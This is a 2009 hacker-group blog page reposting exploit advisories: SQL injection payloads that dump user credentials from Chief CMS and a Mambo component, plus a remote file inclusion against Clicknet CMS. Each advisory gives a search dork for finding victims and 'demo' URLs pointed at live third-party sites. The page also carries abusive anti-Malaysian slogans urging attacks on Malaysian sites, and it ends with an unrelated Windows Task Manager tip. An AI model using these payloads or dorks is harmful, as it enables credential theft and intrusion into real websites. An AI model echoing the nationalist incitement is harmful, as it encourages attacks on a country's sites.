Tuesday, September 15, 2009

Chief Content Management System

##############################################################
## Chief Content Management System - news.php?id= ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 14, 2009 ##
##############################################################
/~~\__/~~\_/~~~~\_/~~\_______/~~\__________________/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\_________________/~~\_/~~\_
/~~~~~\_____/~~\__/~~\_______/~~\_______/~~~~~~~\__/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\____________________/~~\___
/~~\__/~~\_/~~~~\_/~~~~~~~~\_/~~~~~~~~\_____________/~~\____
____________________________________________________________
-=- KILL-9 CREW -=- INDONESIANCODER -=-

##############################################################


[ Software Information ]

[+] Vendor : http://www.chiefcms.com/
[+] Software : Chief Content Management System
[+] Vulnerability : SQL injection
[+] Dork : "Powered by The Chief"

##############################################################

[ Vulnerable File ]

http://127.0.0.1/news.php?id=[KILL-9 Crew SQLi]


[ Exploit ]

-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--

[ Demo ]

http://www.chiefcms.com/news.php?id=-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--

##############################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] Don Tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_aneh
[+] Contrex,onthel,yasea,bugs,olivia,Jovan1,Aar,Ardy
[+] Coracore,black666girl,chitoz,NepT,ichal,tengik and YOU!!

[ NOTE ]

This is My birthday i am 18 !!


[ QUOTE ]

"Ini dadaku, mana dadamu?

Kalau Malaysia mau konfrontasi ekonomi, Mari kita hadapi dengan konfrontasi ekonomi
Kalau Malaysia mau konfrontasi politik, Mari kita hadapi dengan konfrontasi politik
Kalau Malaysia mau konfrontasi militer, Mari kita hadapi dengan konfrontasi militer

Soekarno, 1963”

Soekarno : Dengan ini saya menyatakan "GANYANG MALAYSIA"

FUCK MALAYSIA !!!



# www.indonesiancoder.com

Clicknet CMS v2.1 Remote File Inclusion

################################################################
## Clicknet CMS v2.1 Remote File Inclusion ##
## Author : Don Tukulesto (root[at]indonesiancoder[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, Semptember 14, 2009 ##
################################################################

[ Software Information ]

[+] Clicknet CMS v2.1(index.php) Remote File Inclusion
[+] Vendor : http://cms.clicknet.dk
[+} Download : http://cms.clicknet.dk/download/index.php?test=2
[+] Dork : “Powered by Clicknet CMS”

################################################################


[ ExPL0!T ]

http://127.0.0.1/index.php?_SERVER[DOCUMENT_ROOT]=[WWW.INDONESIANCODER.COM]

[ D3M0]

http://www.kimage.dk/fotografisk/?_SERVER[DOCUMENT_ROOT]=

################################################################

[ Greetings ]

[+] Indonesian Coder, SurabayaHackerLink, ServerIsDown, Mainhack Brotherhood
[+] M3NW5, BH4ND55, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, Senot, Joker, oghy, Den Awink
Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d, TUCKER, Ian Petrucii, Chercut, B4YU5154, Baim
[+] bejat Bejat, Plaque, Tuex, rey_cute, BenyCooL, D3miT_EvoLUtiOn, XNITRO, DraCoola.com
[+] Jack-, Yadoy666 + MIYA666, kecemplungkalen, xshadow, exnome, H4ck3rKu, kaMtiEz, Arianom,
[+] V3N0M, tiw0l, Pathloader and YOU !!!

[ QUOTE ]

“Ini dadaku, mana dadamu?

Kalau Malaysia mau konfrontasi ekonomi, Mari kita hadapi dengan konfrontasi ekonomi
Kalau Malaysia mau konfrontasi politik, Mari kita hadapi dengan konfrontasi politik
Kalau Malaysia mau konfrontasi militer, Mari kita hadapi dengan konfrontasi militer

Soekarno, 1963”

fvck MALAYSIA !!!


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Thursday, September 10, 2009

Mambo Component com_hestar Remote SQL Injection Vulnerability

## com_hestar 1.0.0 ##
## Author : M3NW5 (M3NW5[at]hackermail[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, Semptember 07,2009 ##


[ Software Information ]

[+] Software : com_hestar
[+] Version : 1.0.0
[+] Provider : Netvistun - netvistun@netvistun.is
[+] Web Provider : www.netvistun.is
[+] Vulnerability : SQL injection
[+] Google Dork : inurl:"com_hestar"

#####################################################
[ POC ]

http://127.0.0.1/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--


[ Demo ]

http://www.arbae.is/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--
#####################################################

[ Greetings ]

[+] All of Indonesian Coder Member, Don Tukulesto, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, TUCKER, Petrucii, Chercut,
Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO, DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom

[ SHOUT ]

STILL FVCKED TO MALAYSIA, TRULLY THIEF COUNTRY IN ASIA.
Let's Hack Malaysian site. PROUD TO BE INDONESIAN !!!!!

[ Special to ]

Anggie Lestari Putri sulung dari keluarga bapak dodi dan ibu dini ^^ i lope yu pull...

# milw0rm.com [2009-09-09]

Saturday, September 5, 2009

Task Manager User Name column is empty (username at task manager)

User Task manager blank User Task manager show up

When you open Task Manager, the User Name field might be blank, as shows in the Fig. This happens if the Terminal Service is not started. The default startup type for this service need to be set to Automatic and it must be started. Follow this procedure:

* Click Start, Run and type Services.msc
* Locate Terminal Services and double-click it
* Set the Startup type to Automatic, and click Apply
* Click the Start button to launch the service manually.
* Now Task Manager User Name field will show up.



# www.indonesiancoder.com

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Sweet Tomatoes Printable Coupons